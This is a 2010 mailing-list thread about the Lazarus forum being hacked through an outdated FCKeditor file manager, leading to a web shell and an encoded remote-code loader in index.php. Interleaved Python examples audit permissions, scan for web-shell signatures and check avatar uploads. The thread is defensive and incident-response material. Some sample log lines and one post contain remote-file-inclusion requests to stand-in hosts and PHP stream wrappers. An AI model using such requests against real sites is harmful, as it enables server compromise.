Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-26 Thread waldo kitty


they've either fixed the one on the forums already or my blocking of ohloh.net 
has possibly prevented it... there has been a recent rash of mess getting into 
numerous places... one that has been rather unnerving has been where an iframe 
(IIRC) was put in place with a Z axis of the highest numerical entity that made 
it appear that all content was removed and replaced by the ad being shoved in...


testing www.lazarus.freepascal.org shows me the exact same page as 
forums.lazarus.freepascal.org... and neither carry the "index.php?action" item 
in my testing...


On 1/26/2010 21:20, Marcelo B de Paula wrote:

Hi there,

The Lazarus forum
(http://forum.lazarus.freepascal.org/index.php?action=forum) is very,
very slow ATM, it takes me > 1 minute to load a page (tested on
different systems, with different OSes and different browsers).

When I viewed the source I discovered > 1000 lines (after the normal
code for the page) like:

hp printers can use xp and windows 7 <a href="http://www.saleschampions2006.org/store/windows-xp/hp-printers---can--use-xp-and-windows-7.php">hp printers can use xp and windows 7</a>


Same here, but in main page http://www.lazarus.freepascal.org

Marcelo.


--
___
Lazarus mailing list
Lazarus@lists.lazarus.freepascal.org
http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus






Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-26 Thread Matt Shaffer
For the record, the lazarus site's SMF installation is out of date (by 1
version), I'd recommend patching it up. I love SMF's upgrade process... so
simple.

On Tue, Jan 26, 2010 at 10:15 PM, waldo kitty wrote:

>
> they've either fixed the one on the forums already or my blocking of
> ohloh.net has possibly prevented it... there has been a recent rash of
> mess getting into numerous places... one that has been rather unnerving has
> been where an iframe (IIRC) was put in place with a Z axis of the highest
> numerical entity that made it appear that all content was removed and
> replaced by the ad being shoved in...
>
> testing www.lazarus.freepascal.org shows me the exact same page as
> forums.lazarus.freepascal.org... and neither carry the "index.php?action"
> item in my testing...
>
>
> On 1/26/2010 21:20, Marcelo B de Paula wrote:
>
>>> Hi there,
>>>
>>> The Lazarus forum
>>> (http://forum.lazarus.freepascal.org/index.php?action=forum) is very,
>>> very slow ATM, it takes me > 1 minute to load a page (tested on
>>> different systems, with different OSes and different browsers).
>>>
>>> When I viewed the source I discovered > 1000 lines (after the normal
>>> code for the page) like:
>>>
>>> hp printers can use xp and windows 7 <a href="http://www.saleschampions2006.org/store/windows-xp/hp-printers---can--use-xp-and-windows-7.php">hp printers can use xp and windows 7</a>
>>>
>>
>> Same here, but in main page http://www.lazarus.freepascal.org
>>
>> Marcelo.
>>
>>
>>
>>
>
>


Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-26 Thread Paul Ishenin

27.01.2010 11:50, Matt Shaffer wrote:

For the record, the lazarus site's SMF installation is out of date (by 1
version), I'd recommend patching it up. I love SMF's upgrade process...
so simple.


Not when you have some mods which conflict with the new version install.

Best regards,
Paul Ishenin.




Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread Bart
It seems to be fine again now.

However, at the very bottom of the index page I find:

Loading...

Does this really belong there?

Bart



Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread Marc Weustink

Matt Shaffer wrote:

For the record, the lazarus site's SMF installation is out of date (by 1
version), I'd recommend patching it up. I love SMF's upgrade process...
so simple.


The "infection" is removed. We're currently investigating where it came 
from.
The smf forum was up to date (1.1.11). Unfortunately when restoring 
things, a previous index.php was used, which reports the older version 
(which is the only diff of the file).


I fear the ease of the update process made it also possible to write new 
contents.


Marc



Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread Matt Shaffer
On Wed, Jan 27, 2010 at 10:37 AM, Marc Weustink wrote:
>
> The "infection" is removed. We're currently investigating where it came
> from.
> The smf forum was up to date (1.1.11). Unfortunately when restoring things,
> a previous index.php was used, which reports the older version (which is
> the only diff of the file).
>
> I fear the ease of the update process made it also possible to write new
> contents.
>
> Marc
>
>
I don't see how the ease of the update process would give hackers an
advantage... after all, you still have to have an admin account to perform
that activity.

Keep in mind:
1. An outdated index.php could be a possible culprit, if it had any security
vulnerabilities with it (although I highly doubt this)
2. Any  mods installed may have vulnerabilities
3. If the person updating the forum to 1.1.11 ignored warning messages about
files not being writable, etc, there may still be an outdated file with a
vulnerability from 1.1.10
4. SMF doesn't necessarily have to be the culprit. Exploits in other
software may have given the intruder file/ftp access, allowing him to change
any files anywhere.


Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread Marc Weustink

Matt Shaffer wrote:
On Wed, Jan 27, 2010 at 10:37 AM, Marc Weustink <marc.weust...@cuperus.nl> wrote:


The "infection" is removed. We're currently investigating where it
came from.
The smf forum was up to date (1.1.11). Unfortunately when restoring
things, a previous index.php was used, which reports the older
version (which is the only diff of the file).

I fear the ease of the update process made it also possible to write
new contents.

Marc

 
I don't see how the ease of the update process would give hackers an 
advantage... after all, you still have to have an admin account to 
perform that activity.


It requires the smf dir and file to be writable for the user the forum 
is running on. Which means that any leak can write to these files.



Keep in mind:
1. An outdated index.php could be a possible culprit, if it had any 
security vulnerabilities with it (although I highly doubt this)


Is up to date


2. Any  mods installed may have vulnerabilities


We don't have many mods

3. If the person updating the forum to 1.1.11 ignored warning messages 
about files not being writable, etc, there may still be an outdated file 
with a vulnerability from 1.1.10


We were up to date without any warning.

4. SMF doesn't necessarily have to be the culprit. Exploits in other 
software may have given the intruder file/ftp access, allowing him to 
change any files anywhere.


There is no public external access to that machine. No shell, no ftp. 
Only web.


Marc



Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread Matt Shaffer
Well, there doesn't have to be shell/ftp for the person to have access to
files ;) As long as they're able to upload their own file manager through an
exploit...

Anyway, I can't think of any other possibilities. But, wouldn't it be
possible to change the permissions of SMF's files when an update is needed,
and then changing the permissions back to read only? Granted, this could be
limiting and is certainly annoying, but it's better than having the forums
hacked to pieces.

On Wed, Jan 27, 2010 at 5:04 PM, Marc Weustink wrote:

> Matt Shaffer wrote:
>
>> On Wed, Jan 27, 2010 at 10:37 AM, Marc Weustink <marc.weust...@cuperus.nl> wrote:
>>
>>The "infection" is removed. We're currently investigating where it
>>came from.
>>The smf forum was up to date (1.1.11). Unfortunately when restoring
>>things, a previous index.php was used, which reports the older
>>version. (which is the only diff of the file)
>>
>>I fear the ease of the update process made it also possible to write
>>new contents.
>>
>>Marc
>>
>>  I don't see how the ease of the update process would give hackers an
>> advantage... after all, you still have to have an admin account to perform
>> that activity.
>>
>
> It requires the smf dir and file to be writable for the user the forum is
> running on. Which means that any leak can write to these files.
>
>
>  Keep in mind:
>> 1. An outdated index.php could be a possible culprit, if it had any
>> security vulnerabilities with it (although I highly doubt this)
>>
>
> Is up to date
>
>
>  2. Any  mods installed may have vulnerabilities
>>
>
> We don't have many mods
>
>
>  3. If the person updating the forum to 1.1.11 ignored warning messages
>> about files not being writable, etc, there may still be an outdated file
>> with a vulnerability from 1.1.10
>>
>
> We were up to date without any warning.
>
>
>  4. SMF doesn't necessarily have to be the culprit. Exploits in other
>> software may have given the intruder file/ftp access, allowing him to change
>> any files anywhere.
>>
>
> there is no public external access to that machine. No shell, no ftp. only
> web.
>
>
> Marc
>
>
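A concrete version of the permission scheme discussed in this exchange, covering Marc's point that a web-server account able to write the SMF tree means any leak can write to it, and Matt's suggestion of flipping the files to read-only between updates. This is Python example code added to this archive, not part of SMF or of the Lazarus site's setup; the web-server uid and gids, the file layout and the allowlisted attachments directory are constructed for the demo, and POSIX ACLs and root's override are out of scope.

```python
"""Audit a web root for files the web-server account can write to, then
strip those write bits except under directories that must stay writable.

Example code added to this thread; it is not part of SMF or of the
Lazarus site's setup. Assumptions (constructed for the demo): the
web-server account is described by a numeric uid plus a set of gids
supplied by the caller; POSIX ACLs and root's override are out of scope.
"""
import os
import stat
import tempfile


def web_user_can_write(st: os.stat_result, web_uid: int, web_gids: set) -> bool:
    """Classic owner/group/other evaluation of the write bit, as seen by a
    PHP process running under the web-server account."""
    mode = st.st_mode
    if st.st_uid == web_uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in web_gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def _allowlisted(rel: str, allow_dirs) -> bool:
    return any(rel == d or rel.startswith(d + os.sep) for d in allow_dirs)


def audit_writable(root: str, web_uid: int, web_gids: set, allow_dirs=()) -> list:
    """Relative paths under root the web account could modify, ignoring
    allowlisted directories (attachments, cache, ...)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if _allowlisted(rel, allow_dirs):
                continue
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink bits are meaningless; judge the target separately
            if web_user_can_write(st, web_uid, web_gids):
                findings.append(rel)
    return sorted(findings)


def lock_down(root: str, web_uid: int, web_gids: set, allow_dirs=()) -> list:
    """Clear every write bit the web account could use on the flagged paths.
    Caveat: if the web account *owns* a file it can chmod it back, so the
    code must belong to a separate admin account for read-only to mean
    anything; an admin doing an SMF update re-enables writes and runs this
    again afterwards."""
    changed = []
    for rel in audit_writable(root, web_uid, web_gids, allow_dirs):
        path = os.path.join(root, rel)
        st = os.lstat(path)
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid == web_uid:
            mode &= ~stat.S_IWUSR
        if st.st_gid in web_gids:
            mode &= ~stat.S_IWGRP
        mode &= ~stat.S_IWOTH
        os.chmod(path, mode)
        changed.append(rel)
    return changed


def demo() -> dict:
    """Build a constructed mini web root and audit it before and after."""
    root = tempfile.mkdtemp(prefix="smf-demo-")
    layout = {
        "index.php": 0o644,                          # fine
        "Sources/Load.php": 0o666,                   # world-writable: bad
        "Themes/default/index.template.php": 0o664,  # group-writable: bad when the web user shares the group
        "attachments/keep.txt": 0o666,               # allowlisted upload dir
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // constructed placeholder\n")
        os.chmod(path, mode)
    for d in ("Sources", "Themes", "Themes/default", "attachments"):
        os.chmod(os.path.join(root, d), 0o755)
    web_uid = os.getuid() + 100000  # certainly not the owner of these files
    web_gids = {os.stat(os.path.join(root, "index.php")).st_gid}  # but sharing their group
    allow = ("attachments",)
    before = audit_writable(root, web_uid, web_gids, allow)
    changed = lock_down(root, web_uid, web_gids, allow)
    after = audit_writable(root, web_uid, web_gids, allow)
    return {"before": before, "changed": changed, "after": after}


if __name__ == "__main__":
    print(demo())
```

Run as a script it builds the throwaway tree, reports the two files the web account could write, locks them down and shows the audit coming back empty; the attachments directory stays writable by design, which is the trade-off Matt called "limiting and certainly annoying".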


Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread waldo kitty

On 1/27/2010 16:10, Matt Shaffer wrote:

Keep in mind:
1. An outdated index.php could be a possible culprit, if it had any
security vulnerabilities with it (although I highly doubt this)
2. Any  mods installed may have vulnerabilities
3. If the person updating the forum to 1.1.11 ignored warning messages
about files not being writable, etc, there may still be an outdated file
with a vulnerability from 1.1.10
4. SMF doesn't necessarily have to be the culprit. Exploits in other
software may have given the intruder file/ftp access, allowing him to
change any files anywhere.


and just to add to this and expand on my comment that i made earlier about 
frames with extremely high Z axis numbers... those that have been seen, caught 
and analyzed were done with postings in the forums where they happened... none 
of the content was actually messed with... the high Z axis number just ensured 
that that content was over the top of all others and made it appear that 
everything was done...




Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread Florian Klaempfl
Matt Shaffer wrote:
> Well, there doesn't have to be shell/ftp for the person to have access
> to files ;) 

To ssh, you have to hack a vpn first ;)



Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-27 Thread Matt Shaffer
Right, but what I meant was if someone manages to upload their own PHP file
to the lazarus server, they can easily have uploaded a PHP file manager
which has the capability of deleting files, etc, without ever needing
ssh/ftp (this assumes the attack was done through a vulnerable piece of
software, that had write permissions, etc.)

I don't think this scenario is extremely likely.

On Thu, Jan 28, 2010 at 2:42 AM, Florian Klaempfl wrote:

> Matt Shaffer wrote:
> > Well, there doesn't have to be shell/ftp for the person to have access
> > to files ;)
>
> To ssh, you have to hack a vpn first ;)
>
>


Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-28 Thread Marc Weustink

Matt Shaffer wrote:

Right, but what I meant was if someone manages to upload their own PHP
file to the lazarus server, they can easily have uploaded a PHP file
manager which has the capability of deleting files, etc, without ever
needing ssh/ftp (this assumes the attack was done through a vulnerable
piece of software, that had write permissions, etc.)

I don't think this scenario is extremely likely.


This is probably what happened.
As I see now, together with tinyportal comes an outdated FCKeditor. This 
editor has known issues. The file manager in this editor has access to 
some tp subdir where we found a php "filemanager" through which you 
could upload files to the whole site.
This way some "buy-your-software-here" webshop got installed and then 
managed to add a piece of encoded php to index.php.
What this encoded piece did was access a remote server, which in turn 
returned a piece of php which got executed. This piece of php 
accesses our or similar webshops to generate traffic.

This last part made browsing the site slow.

At this moment the FCKeditor is disabled and removed.

Marc



Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-28 Thread patspiper

Was the php shell C99madshell?

It seems many sites have been recently compromised via this shell.  The 
ways the shell is uploaded depends on the vulnerabilities of the forum 
software.


Marc Weustink wrote:

Matt Shaffer wrote:

Right, but what I meant was if someone manages to upload their own PHP
file to the lazarus server, they can easily have uploaded a PHP file
manager which has the capability of deleting files, etc, without ever
needing ssh/ftp (this assumes the attack was done through a vulnerable
piece of software, that had write permissions, etc.)

I don't think this scenario is extremely likely.


This is probably what happened.
As I see now, together with tinyportal comes an outdated FCKeditor. 
This editor has known issues. The file manager in this editor has 
access to some tp subdir where we found a php "filemanager" through 
which you could upload files to the whole site.
This way some "buy-your-software-here" webshop got installed and then 
managed to add a piece of encoded php to index.php.
What this encoded piece did was access a remote server, which in turn 
returned a piece of php which got executed. This piece of php 
accesses our or similar webshops to generate traffic.

This last part made browsing the site slow.

At this moment the FCKeditor is disabled and removed.

Marc







Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-28 Thread Marc Weustink

patspiper wrote:

Was the php shell C99madshell?


Nope: ws.php -> #Web Shell by oRb

Marc


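Two checks that would have caught what Marc describes above: the encoded php appended to index.php, and the ws.php web shell identified by its "#Web Shell by oRb" banner. One is a content scan for obfuscated-loader and known-shell patterns, the other a hash comparison against a known-good baseline, which is effectively how the index.php diff was found when restoring. This is Python example code added to this archive, not from SMF or the Lazarus site; the file contents and baseline hashes are constructed for the demo, and the only strings taken from the incident are the two shell banners named in this thread.

```python
"""Content scan plus integrity check for a PHP tree.

Example code added to this thread; not from SMF or the Lazarus site. The
sample files and the release baseline are constructed for the demo.
"""
import base64
import hashlib
import re

# Patterns that are almost never legitimate in a forum's own sources.
RULES = [
    ("eval-of-decoded-blob",
     re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("eval-of-fetched-content",
     re.compile(r"eval\s*\(\s*(?:file_get_contents|curl_exec|fread)\s*\(", re.I)),
    ("known-webshell-banner",
     re.compile(r"Web Shell by oRb|c99madshell", re.I)),
]


def scan_source(text: str) -> list:
    """Names of the rules that match one PHP file's contents."""
    return [name for name, rx in RULES if rx.search(text)]


def scan_tree(files: dict) -> dict:
    """path -> matched rule names, for every file with at least one match."""
    report = {}
    for path, text in files.items():
        hits = scan_source(text)
        if hits:
            report[path] = hits
    return report


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def integrity_check(files: dict, baseline: dict) -> dict:
    """Compare a tree against release hashes: 'modified' files differ from
    the baseline, 'unexpected' files are not in the baseline at all (a
    dropped web shell shows up here even when no content rule matches)."""
    modified = sorted(p for p, t in files.items()
                      if p in baseline and baseline[p] != sha256(t))
    unexpected = sorted(p for p in files if p not in baseline)
    return {"modified": modified, "unexpected": unexpected}


# --- constructed sample tree -------------------------------------------
CLEAN_INDEX = ("<?php\n// constructed stand-in for the forum front controller\n"
               "require_once 'Settings.php';\nloadTheme();\n")
LOAD_PHP = "<?php\n// constructed\nfunction loadTheme() {}\n"
# A harmless base64 blob standing in for the encoded loader; the rule keys
# on the eval(base64_decode(...)) shape, not on the payload.
BLOB = base64.b64encode(b"echo 'constructed placeholder';").decode()
INFECTED_INDEX = CLEAN_INDEX + "<?php eval(base64_decode('%s')); ?>\n" % BLOB
WEBSHELL_STUB = "<?php\n#Web Shell by oRb\n// body omitted: only the banner is used here\n"

SAMPLE_FILES = {
    "index.php": INFECTED_INDEX,
    "Sources/Load.php": LOAD_PHP,
    "tp/ws.php": WEBSHELL_STUB,
}
RELEASE_BASELINE = {
    "index.php": sha256(CLEAN_INDEX),
    "Sources/Load.php": sha256(LOAD_PHP),
}


def demo() -> dict:
    """Run both checks over the constructed tree."""
    return {"content": scan_tree(SAMPLE_FILES),
            "integrity": integrity_check(SAMPLE_FILES, RELEASE_BASELINE)}


if __name__ == "__main__":
    print(demo())
```

The integrity half is the one to rely on: pattern rules miss any loader written to dodge them, whereas a release tarball's hashes flag every modified or added file regardless of how it is encoded, which is why keeping a baseline of the deployed tree is worth more than a signature list.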


Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-28 Thread waldo kitty

On 1/28/2010 02:42, Florian Klaempfl wrote:

Matt Shaffer wrote:

Well, there doesn't have to be shell/ftp for the person to have access
to files ;)


To ssh, you have to hack a vpn first ;)


why? MitM setups aren't that hard... i know of at least one chat proxy package 
that does this so as to allow for monitoring of chats and file exchanges as well 
as injecting "you are being monitored" and similar messages into the chat 
stream... yes, this is mostly for corporate and home use but it is still easy 
enough to do and no "hacking" necessary :P




Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-28 Thread waldo kitty

On 1/28/2010 02:55, Matt Shaffer wrote:

Right, but what I meant was if someone manages to upload their own PHP
file to the lazarus server, they can easily have uploaded a PHP file
manager which has the capability of deleting files, etc, without ever
needing ssh/ftp (this assumes the attack was done through a vulnerable
piece of software, that had write permissions, etc.)

I don't think this scenario is extremely likely.


what is there to upload? all it takes is a var that is not properly sanitized 
that references a shell script on another site which then executes in the 
context of the server with the bad code... this is all too common an occurrence 
as my IDS shows on my practically invisible site... this isn't sql injection or 
anything like that but simply stuffing a POST or GET var with something like 
"hxxp://bad.domain.tld/shell_script" and having the code actually get it and 
execute it...


proper sanitizing of ALL vars, whether user input or "hidden" must be done in 
any web application to ensure that what is being received is valid for the 
application...




Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-28 Thread waldo kitty

On 1/28/2010 12:17, patspiper wrote:

Was the php shell C99madshell?

It seems many sites have been recently compromised via this shell. The
ways the shell is uploaded depends on the vulnerabilities of the forum
software.


my point that i just tried to make in a (very) recent post is that this type of 
c4rp would not happen if the vars passed in the GET and POST were properly 
sanitized ;)


FWIW: it doesn't matter which shellcode was used as long as any shellcode can be 
pulled from a remote site via an unsanitized var...


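The case waldo kitty describes in his two posts above, a GET or POST var stuffed with a remote URL that unsanitized code then fetches and executes, seen from the defender's side: one function flags request parameters whose values name a remote resource or a PHP stream wrapper in access-log lines, the other shows what "properly sanitized" looks like for a file-selecting parameter, an allowlist lookup instead of passing the value to include(). This is Python example code added to this archive, not from SMF or the Lazarus site; the log lines, parameter names, hosts and page table are constructed for the demo.

```python
"""Flag remote-inclusion-style parameter values in access logs, and resolve a
page selector by allowlist instead of trusting the client's string.

Example code added to this thread, not from SMF or the Lazarus site. The
log lines, parameter names and page table are constructed for the demo.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed lines in Apache "combined" format. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges; bad.example is not a real host.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jan/2010:02:55:01 +0100] "GET /index.php?action=forum HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Jan/2010:02:55:07 +0100] "GET /index.php?theme=http://bad.example/s.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.8"
203.0.113.9 - - [28/Jan/2010:02:55:09 +0100] "GET /index.php?page=php://input HTTP/1.1" 200 5120 "-" "libwww-perl/5.8"
198.51.100.4 - - [28/Jan/2010:02:56:00 +0100] "POST /index.php?action=login2 HTTP/1.1" 302 0 "http://forum.example/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Schemes that make PHP's include()/fopen() reach outside the local tree.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data"}


def is_remote_value(value: str) -> bool:
    """True when a parameter value would be treated as a URL or stream
    wrapper by PHP's file functions."""
    return urlsplit(value).scheme.lower() in REMOTE_SCHEMES


def find_remote_inclusion_attempts(log_text: str) -> list:
    """(ip, parameter, value) for each query parameter carrying a remote value.
    Only the query string is visible here; POST bodies never reach the
    access log, which is exactly why validation inside the application,
    not log review, is the real control."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if is_remote_value(value):
                hits.append((m.group("ip"), name, value))
    return hits


# What sanitizing a file-selecting parameter should look like: the client
# picks a key, the server picks the path. The unsafe PHP shape this replaces
# is  include($_GET['page'] . '.php');  with the value used verbatim.
ALLOWED_PAGES = {
    "forum": "Sources/Forum.php",
    "help": "Sources/Help.php",
    "search": "Sources/Search.php",
}


def resolve_page(selector: str) -> str:
    """Map a selector to a server-side path or raise; a URL, a wrapper or a
    ../ string is simply not a key in the table, so no pattern-matching on
    the hostile input is needed."""
    try:
        return ALLOWED_PAGES[selector]
    except KeyError:
        raise ValueError("unknown page selector: %r" % selector) from None


if __name__ == "__main__":
    for hit in find_remote_inclusion_attempts(SAMPLE_LOG):
        print("remote value in parameter:", hit)
    print(resolve_page("forum"))
```

The allowlist is the generalisation of "sanitize ALL vars": rather than trying to strip everything dangerous out of free-form input, the code accepts only the handful of values it has a meaning for, and the hostile value never becomes a path, a URL or an argument to anything.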


Re: [Lazarus] Lazarus Forum seems to be hacked!

2010-01-29 Thread patspiper

waldo kitty wrote:
my point that i just tried to make in a (very) recent post is that 
this type of c4rp would not happen if the vars passed in the GET and 
POST were properly sanitized ;)


FWIW: it doesn't matter which shellcode was used as long as any 
shellcode can be pulled from a remote site via an unsanitized var...

It is not only a matter of sanitizing GET and POST vars. The php shell 
could be uploaded as an avatar (an image) and executed if no proper 
safeguards are taken to prevent that. And this is just one example of 
vulnerabilities.


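The safeguards patspiper alludes to for the "php shell uploaded as an avatar" case, as Python example code added to this archive rather than SMF's own upload handling: an extension allowlist, content sniffing that must agree with the extension, a scan for script markers to catch image/PHP polyglots, a server-chosen file name, and storage without an execute bit in a directory meant to sit outside the document root. The image bytes, file names and size limit are constructed for the demo.

```python
"""Validate and store an avatar upload so that it can never be executed.

Example code added to this thread; not SMF's upload code. The image bytes
and filenames are constructed for the demo.
"""
import os
import secrets
import tempfile


class UploadRejected(ValueError):
    pass


ALLOWED_EXT = {"png": "png", "gif": "gif", "jpg": "jpg", "jpeg": "jpg"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def sniff_image(data: bytes):
    """Identify the format from magic bytes; None for anything else."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpg"
    return None


def validate_avatar(filename: str, data: bytes, max_bytes: int = 64 * 1024) -> str:
    """Return the normalised image kind or raise UploadRejected.
    Checks run cheapest first and every one of them must pass."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed")
    if len(data) > max_bytes:
        raise UploadRejected("too large")
    kind = sniff_image(data)
    if kind is None:
        raise UploadRejected("content is not a supported image")
    if kind != ALLOWED_EXT[ext]:
        raise UploadRejected("extension does not match content")
    # A valid image header followed by PHP is still PHP to a server that
    # hands the file to the interpreter. Re-encoding through an image
    # library is the definitive fix; this marker scan is the cheap first line.
    lower = data.lower()
    if any(marker in lower for marker in SCRIPT_MARKERS):
        raise UploadRejected("embedded script markers")
    return kind


def store_avatar(data: bytes, kind: str, store_dir: str) -> str:
    """Write under a random server-chosen name with no execute bit. The
    client's name is discarded, so avatar.php.png cannot survive as a
    double extension. store_dir is meant to live outside the document root
    and be served by a script that sets Content-Type itself."""
    name = secrets.token_hex(16) + "." + kind
    path = os.path.join(store_dir, name)
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o644)
    return name


PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed header, not a full image
SAMPLES = {
    "good": ("avatar.png", PNG_STUB),
    "php-extension": ("avatar.php", b"<?php echo 'constructed'; ?>"),
    "php-as-png": ("avatar.png", b"<?php echo 'constructed'; ?>"),
    "polyglot-gif": ("avatar.gif", b"GIF89a" + b"<?php echo 'constructed'; ?>"),
    "mismatch": ("avatar.jpg", PNG_STUB),
    "double-ext": ("avatar.php.png", PNG_STUB),
}


def demo() -> dict:
    """Run every constructed sample through validation; 'ok:<kind>' or the reason."""
    store = tempfile.mkdtemp(prefix="avatars-")
    out = {}
    for label, (filename, data) in SAMPLES.items():
        try:
            kind = validate_avatar(filename, data)
            stored = store_avatar(data, kind, store)
            out[label] = "ok:" + stored.rsplit(".", 1)[-1]
        except UploadRejected as exc:
            out[label] = "rejected: " + str(exc)
    return out


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, "->", result)
```

Note which layer catches what: the extension check alone would have passed both the polyglot and the double-extension sample, the sniffing alone would have passed the polyglot, and only the storage rules (random name, no execute bit, served from outside the web root) hold up when every content check has been fooled.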